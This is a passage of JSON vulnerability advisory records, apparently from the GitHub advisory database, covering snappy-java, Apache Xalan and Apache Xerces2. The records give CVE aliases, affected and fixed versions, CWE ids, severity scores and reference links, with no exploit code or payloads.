"1.1.1-M1", "1.1.1-M2", "1.1.1-M3", "1.1.1-M4", "1.1.1.1", "1.1.1.2", "1.1.1.3", "1.1.1.4", "1.1.1.5", "1.1.1.6", "1.1.1.7", "1.1.10.0", "1.1.2", "1.1.2-M1", "1.1.2-RC1", "1.1.2-RC2", "1.1.2-RC3", "1.1.2.1", "1.1.2.2", "1.1.2.3", "1.1.2.4", "1.1.2.5", "1.1.2.6", "1.1.3-M1", "1.1.3-M2", "1.1.4", "1.1.4-M1", "1.1.4-M2", "1.1.4-M3", "1.1.7", "1.1.7.1", "1.1.7.2", "1.1.7.3", "1.1.7.4", "1.1.7.5", "1.1.7.6", "1.1.7.7", "1.1.7.8", "1.1.8", "1.1.8.1", "1.1.8.2", "1.1.8.3", "1.1.8.4", "1.1.9.0", "1.1.9.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.1.10.0", "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-qcwq-55hx-v3vh/GHSA-qcwq-55hx-v3vh.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/xerial/snappy-java/security/advisories/GHSA-qcwq-55hx-v3vh" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34455" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea" }, { "type": "PACKAGE", "url": "https://github.com/xerial/snappy-java" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/SnappyInputStream.java#L388" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/SnappyInputStream.java" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230818-0009" } ], "database_specific": { "cwe_ids": [ "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2023-06-15T17:15:06Z", "nvd_published_at": "2023-06-15T18:15:09Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9339-86wc-4qgf", "published": "2022-07-20T00:00:18Z", "modified": "2024-06-25T02:34:59.864497Z", "aliases": [ "CVE-2022-34169" ], "summary": "Apache Xalan Java XSLT library integer truncation issue when processing malicious XSLT stylesheets", "details": "The Apache Xalan Java XSLT library is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets. 
This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode.\n\nA fix for this issue was published in September 2022 as part of an anticipated 2.7.3 release.", "affected": [ { "package": { "name": "xalan:xalan", "ecosystem": "Maven", "purl": "pkg:maven/xalan/xalan" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.3" } ] } ], "versions": [ "2.1.0", "2.3.1", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.D1", "2.6.0", "2.7.0", "2.7.1", "2.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-9339-86wc-4qgf/GHSA-9339-86wc-4qgf.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-34169" }, { "type": "WEB", "url": "https://xalan.apache.org" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5256" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5192" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5188" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0006" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220729-0009" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202401-25" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YULPNO3PAWMEQQZV2C54I3H3ZOXFZUTB" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L3XPOTPPBZIPFBZHQE5E7OW6PDACUMCJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KO3DXNKZ4EU3UZBT6AAR4XRKCD73KLMO" }, { "type": "WEB", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JN3EVGR7FD3ZLV5SBTJXUIDCMSK4QUE2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I5OZNAZJ4YHLOKRRRZSWRT5OJ25E4XLM" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/H4YNJSJ64NPCNKFPNBYITNZU5H3L4D6L" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YULPNO3PAWMEQQZV2C54I3H3ZOXFZUTB" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L3XPOTPPBZIPFBZHQE5E7OW6PDACUMCJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KO3DXNKZ4EU3UZBT6AAR4XRKCD73KLMO" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JN3EVGR7FD3ZLV5SBTJXUIDCMSK4QUE2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I5OZNAZJ4YHLOKRRRZSWRT5OJ25E4XLM" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/H4YNJSJ64NPCNKFPNBYITNZU5H3L4D6L" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00024.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread/x3f7xv3p1g32qj2hlg8wd57pwcpld471" }, { "type": "WEB", "url": "https://lists.apache.org/thread/2qvl7r43wb4t8p9dd9om1bnkssk07sn8" }, { "type": "WEB", "url": "https://lists.apache.org/thread/12pxy4phsry6c34x2ol4fft6xlho4kyw" }, { "type": "WEB", "url": "https://gitbox.apache.org/repos/asf?p=xalan-java.git;a=commit;h=da3e0d06b467247643ce04e88d3346739d119f21" }, { "type": "WEB", "url": 
"https://gitbox.apache.org/repos/asf?p=xalan-java.git;a=commit;h=ab57211e5d2e97cbed06786f919fa9b749c83573" }, { "type": "WEB", "url": "https://gitbox.apache.org/repos/asf?p=xalan-java.git;a=commit;h=2e60d0a9a5b822c4abf9051857973b1c6babfe81" }, { "type": "PACKAGE", "url": "https://gitbox.apache.org/repos/asf?p=xalan-java.git" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/168186/Xalan-J-XSLTC-Integer-Truncation.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/07/19/5" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/07/19/6" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/07/20/2" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/07/20/3" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/10/18/2" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/11/04/8" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/11/07/2" } ], "database_specific": { "cwe_ids": [ "CWE-681" ], "github_reviewed": true, "github_reviewed_at": "2022-07-21T22:28:36Z", "nvd_published_at": "2022-07-19T18:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rc2w-r4jq-7pfx", "published": "2022-05-13T01:05:38Z", "modified": "2025-04-13T23:37:05.402190Z", "aliases": [ "CVE-2014-0107" ], "summary": "Improper Authorization in Apache Xalan-Java", "details": "The TransformerFactory in Apache Xalan-Java before 2.7.2 does not properly restrict access to certain properties when FEATURE_SECURE_PROCESSING is enabled, which allows remote attackers to bypass expected restrictions and load arbitrary classes or access external resources via a crafted (1) xalan:content-header, (2) xalan:entities, (3) xslt:content-header, or (4) xslt:entities property, or a Java property that is bound to the XSLT 
1.0 system-property function.", "affected": [ { "package": { "name": "xalan:xalan", "ecosystem": "Maven", "purl": "pkg:maven/xalan/xalan" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.2" } ] } ], "versions": [ "2.1.0", "2.3.1", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.D1", "2.6.0", "2.7.0", "2.7.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-rc2w-r4jq-7pfx/GHSA-rc2w-r4jq-7pfx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-0107" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/92023" }, { "type": "PACKAGE", "url": "https://github.com/apache/xalan-java" }, { "type": "WEB", "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05324755" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/XALANJ-2435" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0c00afcab8f238562e27b3ae7b8af1913c62bc60838fb8b34c19e26b@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2900489bc665a2e32d021bb21f6ce2cb8e6bb5973490eebb9a346bca@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/201604-02" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2018-15" }, 
{ "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-0348.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1351.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-1888.html" }, { "type": "WEB", "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1581058" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674334" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676093" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677145" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680703" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681933" }, { "type": "WEB", "url": "http://www.debian.org/security/2014/dsa-2886" }, { "type": "WEB", "url": "http://www.ibm.com/support/docview.wss?uid=swg21677967" }, { "type": "WEB", "url": "http://www.ocert.org/advisories/ocert-2014-002.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html" } ], "database_specific": { "cwe_ids": [ "CWE-285" ], "github_reviewed": true, "github_reviewed_at": "2022-07-07T23:02:09Z", "nvd_published_at": "2014-04-15T23:13:00Z", "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-334p-wv2m-w3vp", "published": "2020-06-15T18:51:30Z", "modified": "2024-12-02T05:40:14.119313Z", "aliases": [ "CVE-2009-2625" ], "summary": "Denial of service in Apache Xerces2", "details": "XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.", "affected": 
[ { "package": { "name": "xerces:xercesImpl", "ecosystem": "Maven", "purl": "pkg:maven/xerces/xercesImpl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.10.0" } ] } ], "versions": [ "2.0.0", "2.0.2", "2.2.1", "2.3.0", "2.4.0", "2.5.0", "2.6.0", "2.6.1", "2.6.2", "2.6.2-jaxb-1.0.6", "2.7.1", "2.8.0", "2.8.1", "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-334p-wv2m-w3vp/GHSA-334p-wv2m-w3vp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-2625" }, { "type": "WEB", "url": "https://github.com/apache/xerces2-j/commit/0bdf77af1d4fd26ec2e630fb6d12e2dfa77bc12b" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=512921" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8520" }, { "type": "WEB", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9356" }, { "type": "WEB", "url": "https://rhn.redhat.com/errata/RHSA-2009-1199.html" }, { "type": "WEB", "url": "https://rhn.redhat.com/errata/RHSA-2009-1200.html" }, { "type": "WEB", "url": "https://rhn.redhat.com/errata/RHSA-2009-1201.html" }, { "type": "WEB", "url": "https://rhn.redhat.com/errata/RHSA-2009-1636.html" }, { "type": "WEB", "url": "https://rhn.redhat.com/errata/RHSA-2009-1637.html" }, { "type": "WEB", "url": "https://rhn.redhat.com/errata/RHSA-2009-1649.html" }, { "type": "WEB", "url": "https://rhn.redhat.com/errata/RHSA-2009-1650.html" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-XERCES-32014" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00310.html" }, { "type": "WEB", "url": 
"https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00325.html" }, { "type": "WEB", "url": "http://lists.apple.com/archives/security-announce/2009/Sep/msg00000.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2009-10/msg00001.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2009-10/msg00004.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00002.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2010-06/msg00001.html" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=125787273209737\u0026w=2" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2012-1232.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2012-1537.html" }, { "type": "WEB", "url": "http://secunia.com/advisories/36162" }, { "type": "WEB", "url": "http://secunia.com/advisories/36176" }, { "type": "WEB", "url": "http://secunia.com/advisories/36180" }, { "type": "WEB", "url": "http://secunia.com/advisories/36199" }, { "type": "WEB", "url": "http://secunia.com/advisories/37300" }, { "type": "WEB", "url": "http://secunia.com/advisories/37460" }, { "type": "WEB", "url": "http://secunia.com/advisories/37671" }, { "type": "WEB", "url": "http://secunia.com/advisories/37754" }, { "type": "WEB", "url": "http://secunia.com/advisories/38231" }, { "type": "WEB", "url": "http://secunia.com/advisories/38342" }, { "type": "WEB", "url": "http://secunia.com/advisories/43300" }, { "type": "WEB", "url": "http://secunia.com/advisories/50549" }, { "type": "WEB", "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2011\u0026m=slackware-security.486026" }, { "type": "WEB", "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-21-125136-16-1" }, { "type": "WEB", "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-263489-1" }, { "type": "WEB", "url": 
"http://sunsolve.sun.com/search/document.do?assetkey=1-66-272209-1" }, { "type": "WEB", "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-77-1021506.1-1" }, { "type": "WEB", "url": "http://svn.apache.org/viewvc/xerces/java/trunk/src/org/apache/xerces/impl/XMLScanner.java?r1=572055\u0026r2=787352\u0026pathrev=787353\u0026diff_format=h" }, { "type": "WEB", "url": "http://www.cert.fi/en/reports/2009/vulnerability2009085.html" }, { "type": "WEB", "url": "http://www.codenomicon.com/labs/xml" }, { "type": "WEB", "url": "http://www.debian.org/security/2010/dsa-1984" }, { "type": "WEB", "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:209" }, { "type": "WEB", "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2011:108" }, { "type": "WEB", "url": "http://www.networkworld.com/columnists/2009/080509-xml-flaw.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2009/09/06/1" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2009/10/22/9" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2009/10/23/6" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2009/10/26/3" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpujan2010-084891.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2009-096303.html" }, { "type": "WEB", "url": "http://www.redhat.com/support/errata/RHSA-2009-1615.html" }, { "type": "WEB", "url": "http://www.redhat.com/support/errata/RHSA-2011-0858.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/507985/100/0/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/35958" }, { "type": "WEB", "url": "http://www.securitytracker.com/id?1022680" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-890-1" }, { "type": "WEB", "url": "http://www.us-cert.gov/cas/techalerts/TA09-294A.html" }, { "type": "WEB", "url": 
"http://www.us-cert.gov/cas/techalerts/TA10-012A.html" }, { "type": "WEB", "url": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html" }, { "type": "WEB", "url": "http://www.vupen.com/english/advisories/2009/2543" }, { "type": "WEB", "url": "http://www.vupen.com/english/advisories/2009/3316" }, { "type": "WEB", "url": "http://www.vupen.com/english/advisories/2011/0359" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-15T15:55:30Z", "nvd_published_at": "2009-08-06T15:30:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-7j4h-8wpf-rqfh", "published": "2022-05-13T01:01:06Z", "modified": "2024-12-03T06:18:52.393319Z", "aliases": [ "CVE-2013-4002" ], "summary": "Missing XML Validation in Apache Xerces2", "details": "XMLscanner.java in Apache Xerces2 Java Parser before 2.12.0, as used in the Java Runtime Environment (JRE) in IBM Java 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6, and 7 before 7 SR5 as well as Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, Java SE Embedded 7u40 and earlier, and possibly other products allows remote attackers to cause a denial of service via vectors related to XML attribute names.", "affected": [ { "package": { "name": "xerces:xercesImpl", "ecosystem": "Maven", "purl": "pkg:maven/xerces/xercesImpl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.12.0" } ] } ], "versions": [ "2.0.0", "2.0.2", "2.10.0", "2.11.0", "2.2.1", "2.3.0", "2.4.0", "2.5.0", "2.6.0", "2.6.1", "2.6.2", "2.6.2-jaxb-1.0.6", "2.7.1", "2.8.0", "2.8.1", "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7j4h-8wpf-rqfh/GHSA-7j4h-8wpf-rqfh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-4002" 
}, { "type": "WEB", "url": "https://github.com/apache/xerces2-j/commit/266e837852e0f0e3c8c1ad572b6fc4dbb4ded17" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2014:0414" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/85260" }, { "type": "PACKAGE", "url": "https://github.com/apache/xerces2-j" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/XERCESJ-1679" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/49dc6702104a86ecbb40292dcd329ce9ae4c32b74733199ecab14a73@%3Cj-users.xerces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html" }, { "type": "WEB", "url": "http://lists.apple.com/archives/security-announce/2013/Oct/msg00001.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00026.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00027.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00028.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00029.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00000.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00003.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00010.html" }, { "type": "WEB", "url": 
"http://lists.opensuse.org/opensuse-updates/2013-11/msg00023.html" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=138674031212883\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=138674073720143\u0026w=2" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-1059.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-1060.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-1081.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-1440.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-1447.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-1451.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-1505.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1818.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1821.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1822.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1823.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0675.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0720.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0765.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0773.html" }, { "type": "WEB", "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "type": "WEB", "url": "http://support.apple.com/kb/HT5982" }, { "type": "WEB", "url": "http://svn.apache.org/viewvc/xerces/java/trunk/src/org/apache/xerces/impl/XMLScanner.java?r1=965250\u0026r2=1499506\u0026view=patch" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IC98015" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21644197" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21653371" }, { "type": 
"WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21657539" }, { "type": "WEB", "url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS13-025/index.html" }, { "type": "WEB", "url": "http://www.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm_filenet_content_manager_and_ibm_content_foundation_xml_4j_denial_of_service_attack_cve_2013_4002" }, { "type": "WEB", "url": "http://www.ibm.com/developerworks/java/jdk/alerts/#IBM_Security_Update_July_2013" }, { "type": "WEB", "url": "http://www.ibm.com/support/docview.wss?uid=swg21648172" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2033-1" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2089-1" } ], "database_specific": { "cwe_ids": [ "CWE-112" ], "github_reviewed": true, "github_reviewed_at": "2022-07-08T19:14:49Z", "nvd_published_at": "2013-07-23T11:03:00Z", "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-h65f-jvqw-m9fj", "published": "2022-01-27T16:13:07Z", "modified": "2024-02-16T08:21:32.697367Z", "aliases": [ "CVE-2022-23437" ], "summary": "Infinite Loop in Apache Xerces Java", "details": "There's a vulnerability within the Apache Xerces Java (XercesJ) XML parser when handling specially crafted XML document payloads. This causes, the XercesJ XML parser to wait in an infinite loop, which may sometimes consume system resources for prolonged duration. 
This vulnerability is present within XercesJ version 2.12.1 and the previous versions.", "affected": [ { "package": { "name": "xerces:xercesImpl", "ecosystem": "Maven", "purl": "pkg:maven/xerces/xercesImpl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.12.2" } ] } ], "versions": [ "2.0.0", "2.0.2", "2.10.0", "2.11.0", "2.12.0", "2.12.1", "2.2.1", "2.3.0", "2.4.0", "2.5.0", "2.6.0", "2.6.1", "2.6.2", "2.6.2-jaxb-1.0.6", "2.7.1", "2.8.0", "2.8.1", "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-h65f-jvqw-m9fj/GHSA-h65f-jvqw-m9fj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23437" }, { "type": "PACKAGE", "url": "https://github.com/jboss/xerces" }, { "type": "WEB", "url": "https://lists.apache.org/thread/6pjwm10bb69kq955fzr1n0nflnjd27dl" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221028-0005" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/01/24/3" } ], "database_specific": { "cwe_ids": [ "CWE-91" ], "github_reviewed": true, "github_reviewed_at": "2022-01-25T20:46:16Z", "nvd_published_at": "2022-01-24T15:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vmqm-g3vh-847m", "published": "2020-06-15T18:51:38Z", "modified": "2024-03-11T05:17:10.701030Z", "aliases": [ "CVE-2012-0881" ], "summary": "Denial of service in Apache Xerces2", "details": "Apache Xerces2 Java Parser before 2.12.0 allows remote attackers to cause a denial of service (CPU consumption) via a crafted message to an XML service, which triggers hash table collisions.", 
"affected": [ { "package": { "name": "xerces:xercesImpl", "ecosystem": "Maven", "purl": "pkg:maven/xerces/xercesImpl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.12.0" } ] } ], "versions": [ "2.0.0", "2.0.2", "2.10.0", "2.11.0", "2.2.1", "2.3.0", "2.4.0", "2.5.0", "2.6.0", "2.6.1", "2.6.2", "2.6.2-jaxb-1.0.6", "2.7.1", "2.8.0", "2.8.1", "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-vmqm-g3vh-847m/GHSA-vmqm-g3vh-847m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-0881" }, { "type": "WEB", "url": "https://github.com/apache/xerces2-j/commit/992b5d9c24102ad20330d36c0a71162753a37449" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.openwall.com/lists/oss-security/2014/07/08/11" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rea7b831dceeb2a2fa817be6f63b08722042e3647fb2d47c144370a56@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": 